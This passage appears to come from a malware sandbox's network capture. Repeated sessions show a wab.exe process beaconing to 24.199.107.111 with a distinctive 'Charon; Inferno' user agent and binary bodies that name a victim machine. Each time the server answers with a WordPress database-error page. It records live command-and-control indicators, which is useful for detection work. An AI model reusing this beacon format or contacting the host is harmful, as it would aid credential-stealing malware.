                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:52.401199102 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:52.401211977 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              47192.168.2.54976724.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:52.727350950 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:52.889916897 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:53.718652010 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:52 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:53.718671083 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:53.718686104 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              48192.168.2.54976824.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:54.038794994 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:54.202538013 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:54.967627048 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:54 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:54.967659950 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:54.967679977 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              49192.168.2.54976924.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:55.291837931 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:55.454407930 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:56.267596960 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:55 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
